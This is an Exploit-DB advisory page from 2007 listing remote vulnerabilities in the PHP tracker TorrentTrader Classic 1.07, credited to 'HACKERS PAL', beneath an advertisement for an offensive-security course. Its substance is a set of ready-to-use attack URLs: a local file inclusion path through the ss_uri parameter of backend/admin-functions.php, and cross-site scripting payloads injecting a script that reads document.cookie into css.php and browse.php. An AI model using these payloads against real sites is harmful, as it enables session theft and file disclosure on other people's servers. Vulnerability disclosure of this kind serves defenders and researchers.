TorrentTrader Classic 1.07 - Multiple Vulnerabilities

EDB-ID:

4500




Platform:

PHP

Date:

2007-10-08


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

TorrentTrader Classic Mutiple Remote vulnerabilities
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

Tested on TorrentTrader Classic v1.07
local file inclusion
backend/admin-functions.php?ss_uri=dd
Xss
pjirc/css.php?color=<script>alert(document.cookie);</script>
browse.php?cat=<script>alert(document.cookie);</script>
# WwW.SoQoR.NeT

# milw0rm.com [2007-10-08]